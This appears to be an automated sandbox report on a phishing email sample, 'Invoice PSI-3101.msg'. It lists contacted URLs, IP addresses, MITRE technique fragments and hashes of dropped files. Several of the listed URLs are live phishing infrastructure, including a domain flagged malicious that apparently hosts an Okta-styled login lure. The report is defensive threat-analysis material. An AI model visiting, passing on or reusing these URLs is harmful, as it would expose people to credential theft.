              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading
              LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Extra Window Memory Injection
              Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Invoice PSI-3101.msg0%VirustotalBrowse
              Invoice PSI-3101.msg0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://relaxationstudio.co.uk/pad2.pdf0%Avira URL Cloudsafe
              https://0cp.zlgbgfnebrnn.com/favicon.ico0%Avira URL Cloudsafe
              https://a.nel.cloudflare.com/report/v4?s=ChywVu%2Bh2WSFK70Xiw%2BE4KHICVe%2FsF3bExmhb5uysuABItdiPxmIhRldqaWSoWhMAomcwTWlJT58qBw6rK0WpGTDPK0zWhbT3Dt2COaS5B8LeJOm5HdjWS2Sf0130%Avira URL Cloudsafe
              https://0cp.zlgbgfnebrnn.com/ijgaYhnWUbVeOTmOpVDJTIXGh6Gy6z3kklsgKKUNsFxX4HupdpQJDsYmTgNfA76ef2030%Avira URL Cloudsafe
              https://0cp.zlgbgfnebrnn.com/kludZieQRPg97oN9fbIB511hD89SrD2HIxGmuUHrK1oJvc2ITPe7oIMvtsVfab2300%Avira URL Cloudsafe
              https://0cp.zlgbgfnebrnn.com/GDSherpa-regular.woff20%Avira URL Cloudsafe
              https://0cp.zlgbgfnebrnn.com/stQ7ya0zp2BTKt6FoeeP0Tdgw5L45w5SHIAfuB7BwQZNW0XV2dfD2qgLbweegh2600%Avira URL Cloudsafe
              https://0cp.zlgbgfnebrnn.com/opndtg8BsoD2DAlVS5p1xXKAfrATbUENUmswIUJEY471dstND65HtZdXwilCWmZOojFMWcd2400%Avira URL Cloudsafe
              https://0cp.zlgbgfnebrnn.com/wxG0JrQPMlHU0nNYZc69rsYdteMSIMkC06HWwfr9Z1qASaab1800%Avira URL Cloudsafe
              https://0cp.zlgbgfnebrnn.com/GDSherpa-vf.woff20%Avira URL Cloudsafe
              https://nzt0.kqnsgn.ru/chai@6bdrysu0%Avira URL Cloudsafe
              https://0cp.zlgbgfnebrnn.com/GDSherpa-vf2.woff20%Avira URL Cloudsafe
              https://0cp.zlgbgfnebrnn.com/opbd95W8u6CyERvfeIzCVlbOCPMoyRjo9N26ghrmaenMpLyLV5leABdyw2N64Xeccd1930%Avira URL Cloudsafe
              https://0cp.zlgbgfnebrnn.com/GDSherpa-bold.woff0%Avira URL Cloudsafe
              https://0cp.zlgbgfnebrnn.com/34bG0JveS9mxycv86h67160%Avira URL Cloudsafe
              https://0cp.zlgbgfnebrnn.com/klIGmhIzloSDNVZQ0fJEec8W4AE3cdKofOLl4zYRuZoxcL7s561700%Avira URL Cloudsafe
              https://0cp.zlgbgfnebrnn.com/cl8ulBsJBaxoP9RbS4pqa4Es72Hmt9sFqVDaMcAJkj0%Avira URL Cloudsafe
              https://0cp.zlgbgfnebrnn.com/xyuOFnzMCnJTeNrsDMagh260%Avira URL Cloudsafe
              https://0cp.zlgbgfnebrnn.com/GDSherpa-bold.woff20%Avira URL Cloudsafe
              https://0cp.zlgbgfnebrnn.com/GDSherpa-regular.woff0%Avira URL Cloudsafe
              https://0cp.zlgbgfnebrnn.com/uv5h0mg7HpRqFTgJzv0qPNaRQIYstZmHUle2MO7j121220%Avira URL Cloudsafe
              https://0cp.zlgbgfnebrnn.com/56naWlpDT6aZ2fnGq6UY5UVbghg6djvvXoCdzxf891090%Avira URL Cloudsafe
              https://0cp.zlgbgfnebrnn.com/op4TEEKrolYX7BpNfzzXbRT45ghbLnyhycPa1T8KnqC451310%Avira URL Cloudsafe
              https://0cp.zlgbgfnebrnn.com/rqDbrE3LTvLD4EVdVx6QeXK8dwgPPYB7EypCZ1XJcbfq0%Avira URL Cloudsafe
              https://0cp.zlgbgfnebrnn.com/mnEAwRV8LurwKDnoqzC7tbr6QBNGuv7SezVu3ywnnBk8rAW901410%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              nzt0.kqnsgn.ru
              104.21.31.186
              truefalse
                unknown
                a.nel.cloudflare.com
                35.190.80.1
                truefalse
                  high
                  code.jquery.com
                  151.101.130.137
                  truefalse
                    high
                    cdnjs.cloudflare.com
                    104.17.24.14
                    truefalse
                      high
                      github.com
                      140.82.114.4
                      truefalse
                        high
                        www.google.com
                        142.251.40.132
                        truefalse
                          high
                          s-0005.dual-s-msedge.net
                          52.123.128.14
                          truefalse
                            high
                            d19d360lklgih4.cloudfront.net
                            18.164.124.91
                            truefalse
                              high
                              objects.githubusercontent.com
                              185.199.110.133
                              truefalse
                                high
                                0cp.zlgbgfnebrnn.com
                                104.21.33.80
                                truetrue
                                  unknown
                                  ok4static.oktacdn.com
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    https://0cp.zlgbgfnebrnn.com/wxG0JrQPMlHU0nNYZc69rsYdteMSIMkC06HWwfr9Z1qASaab180false
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7false
                                      high
                                      https://0cp.zlgbgfnebrnn.com/GDSherpa-vf.woff2false
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                        high
                                        https://0cp.zlgbgfnebrnn.com/ijgaYhnWUbVeOTmOpVDJTIXGh6Gy6z3kklsgKKUNsFxX4HupdpQJDsYmTgNfA76ef203false
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                          high
                                          https://0cp.zlgbgfnebrnn.com/4woeJ3F2/true
                                            unknown
                                            https://0cp.zlgbgfnebrnn.com/kludZieQRPg97oN9fbIB511hD89SrD2HIxGmuUHrK1oJvc2ITPe7oIMvtsVfab230false
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://0cp.zlgbgfnebrnn.com/stQ7ya0zp2BTKt6FoeeP0Tdgw5L45w5SHIAfuB7BwQZNW0XV2dfD2qgLbweegh260false
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://nzt0.kqnsgn.ru/chai@6bdrysufalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.cssfalse
                                              high
                                              https://0cp.zlgbgfnebrnn.com/favicon.icofalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://0cp.zlgbgfnebrnn.com/opbd95W8u6CyERvfeIzCVlbOCPMoyRjo9N26ghrmaenMpLyLV5leABdyw2N64Xeccd193false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://0cp.zlgbgfnebrnn.com/opndtg8BsoD2DAlVS5p1xXKAfrATbUENUmswIUJEY471dstND65HtZdXwilCWmZOojFMWcd240false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://0cp.zlgbgfnebrnn.com/GDSherpa-vf2.woff2false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://0cp.zlgbgfnebrnn.com/GDSherpa-regular.woff2false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://0cp.zlgbgfnebrnn.com/tzglhszxrqqpgmyhiajdBXWXB50I8IS90CH?JWTQLNCZODPSGRQCMFEJEtrue
                                                unknown
                                                https://0cp.zlgbgfnebrnn.com/GDSherpa-bold.wofffalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.cssfalse
                                                  high
                                                  https://0cp.zlgbgfnebrnn.com/klIGmhIzloSDNVZQ0fJEec8W4AE3cdKofOLl4zYRuZoxcL7s56170false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://relaxationstudio.co.uk/pad2.pdffalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://a.nel.cloudflare.com/report/v4?s=ChywVu%2Bh2WSFK70Xiw%2BE4KHICVe%2FsF3bExmhb5uysuABItdiPxmIhRldqaWSoWhMAomcwTWlJT58qBw6rK0WpGTDPK0zWhbT3Dt2COaS5B8LeJOm5HdjWS2Sf013false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://0cp.zlgbgfnebrnn.com/34bG0JveS9mxycv86h6716false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://0cp.zlgbgfnebrnn.com/GDSherpa-bold.woff2false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://0cp.zlgbgfnebrnn.com/cl8ulBsJBaxoP9RbS4pqa4Es72Hmt9sFqVDaMcAJkjfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://0cp.zlgbgfnebrnn.com/xyuOFnzMCnJTeNrsDMagh26false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://0cp.zlgbgfnebrnn.com/GDSherpa-regular.wofffalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://0cp.zlgbgfnebrnn.com/uv5h0mg7HpRqFTgJzv0qPNaRQIYstZmHUle2MO7j12122false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://0cp.zlgbgfnebrnn.com/op4TEEKrolYX7BpNfzzXbRT45ghbLnyhycPa1T8KnqC45131false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://0cp.zlgbgfnebrnn.com/56naWlpDT6aZ2fnGq6UY5UVbghg6djvvXoCdzxf89109false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://0cp.zlgbgfnebrnn.com/mnEAwRV8LurwKDnoqzC7tbr6QBNGuv7SezVu3ywnnBk8rAW90141false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhEfalse
                                                    high
                                                    https://0cp.zlgbgfnebrnn.com/rqDbrE3LTvLD4EVdVx6QeXK8dwgPPYB7EypCZ1XJcbfqfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs
                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    140.82.114.4
                                                    github.comUnited States
                                                    36459GITHUBUSfalse
                                                    52.109.4.7
                                                    unknownUnited States
                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                    23.53.126.14
                                                    unknownUnited States
                                                    20940AKAMAI-ASN1EUfalse
                                                    151.101.130.137
                                                    code.jquery.comUnited States
                                                    54113FASTLYUSfalse
                                                    23.51.56.185
                                                    unknownUnited States
                                                    4788TMNET-AS-APTMNetInternetServiceProviderMYfalse
                                                    142.251.40.132
                                                    www.google.comUnited States
                                                    15169GOOGLEUSfalse
                                                    142.251.40.110
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    142.251.32.106
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    34.237.241.83
                                                    unknownUnited States
                                                    14618AMAZON-AESUSfalse
                                                    35.190.80.1
                                                    a.nel.cloudflare.comUnited States
                                                    15169GOOGLEUSfalse
                                                    104.21.31.186
                                                    nzt0.kqnsgn.ruUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    185.199.110.133
                                                    objects.githubusercontent.comNetherlands
                                                    54113FASTLYUSfalse
                                                    104.17.24.14
                                                    cdnjs.cloudflare.comUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    18.164.124.91
                                                    d19d360lklgih4.cloudfront.netUnited States
                                                    3MIT-GATEWAYSUSfalse
                                                    185.199.220.71
                                                    unknownUnited Kingdom
                                                    12488KRYSTALGRfalse
                                                    52.111.251.19
                                                    unknownUnited States
                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                    52.123.128.14
                                                    s-0005.dual-s-msedge.netUnited States
                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                    142.250.81.227
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    172.67.179.44
                                                    unknownUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    18.164.124.110
                                                    unknownUnited States
                                                    3MIT-GATEWAYSUSfalse
                                                    142.251.167.84
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    104.208.16.89
                                                    unknownUnited States
                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                    104.21.33.80
                                                    0cp.zlgbgfnebrnn.comUnited States
                                                    13335CLOUDFLARENETUStrue
                                                    23.203.104.175
                                                    unknownUnited States
                                                    16625AKAMAI-ASUSfalse
                                                    IP
                                                    192.168.2.17
                                                    Joe Sandbox version:42.0.0 Malachite
                                                    Analysis ID:1653720
                                                    Start date and time:2025-04-01 15:16:37 +02:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:22
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • EGA enabled
                                                    Analysis Mode:stream
                                                    Analysis stop reason:Timeout
                                                    Sample name:Invoice PSI-3101.msg
                                                    Detection:MAL
                                                    Classification:mal100.phis.evad.winMSG@42/54@24/82
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .msg
                                                    • Exclude process from analysis (whitelisted): dllhost.exe
                                                    • Excluded IPs from analysis (whitelisted): 23.53.126.14, 23.53.126.62, 52.111.251.19, 52.111.251.17, 52.111.251.16, 52.111.251.18, 52.123.128.14
                                                    • Excluded domains from analysis (whitelisted): ecs.office.com, omex.cdn.office.net, prod1.naturallanguageeditorservice.osi.office.net.akadns.net, dual-s-0005-office.config.skype.com, nleditor.osi.office.net, prod-na.naturallanguageeditorservice.osi.office.net.akadns.net, ecs.office.trafficmanager.net, omex.cdn.office.net.akamaized.net, a1864.dscd.akamai.net, prod-canc-resolver.naturallanguageeditorservice.osi.office.net.akadns.net
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                    • Report size getting too big, too many NtSetValueKey calls found.
                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • VT rate limit hit for: 0cp.zlgbgfnebrnn.com
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):291
                                                    Entropy (8bit):5.194659558134829
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:BEBEB7E60C36B2EB92B55706680339C7
                                                    SHA1:33D554BAAD8F627792DFD15BF7C4FC9BDD40042C
                                                    SHA-256:120CC71A134F2D6A4A96A3D9D8F5137EADC471D25DEC83B754AF593DC4CE9380
                                                    SHA-512:4EB414104385E39CEAC5E0A2E4FCCFDA8A8BBA42525FB29AA169FA528827373211121499750091F31E8283BF6225A46A925E3DB9C60C4DEBF7CB77E01CEB782D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:2025/04/01-09:18:13.688 908 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/04/01-09:18:13.691 908 Recovering log #3.2025/04/01-09:18:13.692 908 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):338
                                                    Entropy (8bit):5.170229264956655
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:7F50AFB0D1B9B72662DEAE19A67F4EA2
                                                    SHA1:C4D0CEADC73A562FC331DD3BF85BE42776AA6750
                                                    SHA-256:8A04DB4BD8DAAA7D247B7FD7A90DCD67833E664C3A936E6C23DD5824212E360F
                                                    SHA-512:48A5EE8CFFA4AA9236F7A3CAC82872245BC775B93CD306890C298E0C43CDF2244CC33907C836F873EB9F5AFC3A783375A73B494510AFF12F9A18E0FCE73C5CD2
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:2025/04/01-09:18:13.605 1b88 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/04/01-09:18:13.608 1b88 Recovering log #3.2025/04/01-09:18:13.609 1b88 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):6495
                                                    Entropy (8bit):5.2418913656090576
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:FF96A97D0C13323714542F5D27756160
                                                    SHA1:A6B5997950C6FCC6D62D320F6FB1C12D5E6C4A77
                                                    SHA-256:3027CD61C08C5BE8BCACCA8846E75C7A3F585B22C1F8DA554288F28D759E04B4
                                                    SHA-512:51DCED380E1D2F1FD08EDF2A79A40D23A74CFF20149F4B890EEBD395E22B6EB2CEC6D62AB151D21BDBADBF2571B8A588B1C3BBB1AE5100E65EABD462C5772AD8
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:*...#................version.1..namespace-....o................next-map-id.1.Pnamespace-42000ee3_e7f8_4e1a_acf9_c35e414a379e-https://rna-resource.acrobat.com/.0F...r................next-map-id.2.Snamespace-c3e8f6d4_f714_436a_92db_f0a4810aae6e-https://rna-v2-resource.acrobat.com/.1.p..r................next-map-id.3.Snamespace-d0743b68_de08_4f3c_b7bc_aca178ee7ff1-https://rna-v2-resource.acrobat.com/.2....o................next-map-id.4.Pnamespace-ce27b6a8_7896_4616_ab45_36a5ede234ad-https://rna-resource.acrobat.com/.3..).^...............Pnamespace-42000ee3_e7f8_4e1a_acf9_c35e414a379e-https://rna-resource.acrobat.com/...^...............Pnamespace-ce27b6a8_7896_4616_ab45_36a5ede234ad-https://rna-resource.acrobat.com/.{VUa...............Snamespace-c3e8f6d4_f714_436a_92db_f0a4810aae6e-https://rna-v2-resource.acrobat.com/....a...............Snamespace-d0743b68_de08_4f3c_b7bc_aca178ee7ff1-https://rna-v2-resource.acrobat.com/yATuo................next-map-id.5.Pnamespace-eb3aef6d_d129_430c_a353_
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):326
                                                    Entropy (8bit):5.1953393735415645
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:AA9B63B25AC637F02E92B9CF360F8EEF
                                                    SHA1:51F93D9EB89184C6A1585457D106F18F45876D68
                                                    SHA-256:B08EEC5C48F5C993AF641DBF789F507E7310FFE3C70B01FECCDD6E0DFB30EFEB
                                                    SHA-512:FC3A7D9B8299A6DACCEF6ED977FC2C73313DAD94F8DD53FF911C341F47E260828EE174B3C375DCD2EB211C4FDFB27B2C200BDE4AB1365CA79A39C08EF4AF7FEF
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:2025/04/01-09:18:13.739 1b88 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/04/01-09:18:13.741 1b88 Recovering log #3.2025/04/01-09:18:13.743 1b88 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:PC bitmap, Windows 3.x format, 117 x -152 x 32, cbSize 71190, bits offset 54
                                                    Category:dropped
                                                    Size (bytes):71190
                                                    Entropy (8bit):1.1153455959528007
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:8071811E41E919B27EF82AC818B4A007
                                                    SHA1:7A558A5F7B13E515A053E4DE343B303B63A4DC4C
                                                    SHA-256:616877D71F82960449F5C5F30AFCCACE360823DC4D89528CDEDF220802ADA61F
                                                    SHA-512:6E65D49F78C6D6FDBFD15F9ECBAB84575F47E7D3AF2EADB4B25937A5B947241A68F404220B1599C0ABDDE583F060374B78E2362F400D9690601E173C8EDD4C75
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:BM........6...(...u...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 11
                                                    Category:dropped
                                                    Size (bytes):86016
                                                    Entropy (8bit):4.444795325725642
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:DF251FFFE96ABDA1AAAE278DA1C03F1D
                                                    SHA1:ADC84409F989388CF2EF6869CA0E7462291BA1D0
                                                    SHA-256:35C34C789F4699F38DA650233D84E14090E3C1AF458BE7A42F7F702AADB02072
                                                    SHA-512:501E779C67A469D9810042AD9B9FE11A732225EBE010DEE554BA7F33FCADBC9CF2C490CD993A075BA036A15BD960FA5CCE24DFC652450C9F3D33A80DFDE899E3
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:SQLite Rollback Journal
                                                    Category:dropped
                                                    Size (bytes):8720
                                                    Entropy (8bit):3.766439326665339
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:FE0375195DF6F4837BDE6377F2527A8E
                                                    SHA1:9DEB1104C5B1261152F5F21B52257D23A03A042C
                                                    SHA-256:C6D20B56118FA929998007C0AF6C36CD3B76D85D76B506243392A0C5FFC98034
                                                    SHA-512:16B3241C81686C53795A32D17255FA1A04CB5F5FC6D5CB9B56F403F7CB8653C7A0EC984CD206E6A88EEC7D9C82E464E91873EC51DD5EFF672550FCD7D42F642C
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:.... .c.....>Zm................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b.r.l...t...}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):4
                                                    Entropy (8bit):0.8112781244591328
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                    SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                    SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                    SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:....
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):2815
                                                    Entropy (8bit):5.136021060718398
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:CF2B8E228F1686822E021EEE9F4D55F1
                                                    SHA1:D170B4860595C9FE7BC3013F17E8A8BD25442BA4
                                                    SHA-256:9C8DDC08624F21CE88596F04FAC915A22E55772B23F53D4E677D3388D29B6784
                                                    SHA-512:23D1C480E2DC759AEED9CFA247D4CA5339E936C1D1F6A6CE7A2739115AF16A5008C45DACFAFC36C66BB0CF2C2B9A6E178DEF3DADAF3EFAAF55A04FBDC123280B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"31e0a5ec9c6948ee34d742a24dab9706","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1743513498000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"f9655e91a08d5ac11397d592d771c938","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":2028,"ts":1743513498000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"e84960e75e9a740b388bc206ab562ecf","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":2129,"ts":1743513498000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"20f91938026d86b26dda6796c21f7de0","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":2080,"ts":1743513498000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"523c8a5b2f3a2f3ec9105fe72c2e034f","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1743513498000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"3b4410dec73ef7cb2bee29dc34719f61","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file",
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 23, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 23
                                                    Category:dropped
                                                    Size (bytes):12288
                                                    Entropy (8bit):1.3580430297907644
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:824832CAB0172A14F60DED8EAE974C5A
                                                    SHA1:15D9ED72066A3B66D39C00AFC409416EEF87BE38
                                                    SHA-256:300F8E2724A52291697DC16E16AF4C55C2708326C6D4D87DBDC4CF30B3B63E25
                                                    SHA-512:CC3A9574CA80CC6CFC015C642028E1A4BC1FCF0806EF1426FCDC7521567CFD2637D70537A25F89094A7EFC6B35036E8D18EADE113B8288947E0EC5F2EBDD2234
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:SQLite Rollback Journal
                                                    Category:dropped
                                                    Size (bytes):8720
                                                    Entropy (8bit):1.831232181497243
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:2386FE610C70C8E6B794E7BDCEB2F83C
                                                    SHA1:4BBBE3E389418C636CBCC5B30B5C5C3F77851CDE
                                                    SHA-256:0246377DD86CDD5F05D8EA6E6DEB42105F9FDDAE067992C6A2430A9EB17DE5C9
                                                    SHA-512:D5FC70CE282CC9B3EB4246FF9AFAC031005D189283AAF7DC8DC38C45130BFCCD8120C4325B0A7CF609604B361E243AB82E66118C0177C725500ED09AB116F0E9
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:.... .c......8.j......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................v.../.././././.-.-.-.-.-.-.-.-.-.-.-.-.-.-........................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):246
                                                    Entropy (8bit):3.5193370621730837
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:63B1B37FB7FFF98492959CDA13BE9B3B
                                                    SHA1:2B84C343F82CEE9F98A6C27E16A335C8B7C40447
                                                    SHA-256:41D6317D3C0AF0EE2DB673D26D281261AD971FAE49D8E2611913B7F69D86765D
                                                    SHA-512:F6379C7B6605F1108FF3DE1CA0B617075D9FA2DDD71AFAD003AD5000429DD8BB6BB92EA3FE92C0227FC41418CF8A6CF7810D427418B2D034D0951D751E68E6BE
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.1./.0.4./.2.0.2.5. . .0.9.:.1.8.:.2.1. .=.=.=.....
                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                    File Type:data
                                                    Category:modified
                                                    Size (bytes):90112
                                                    Entropy (8bit):4.46007915020909
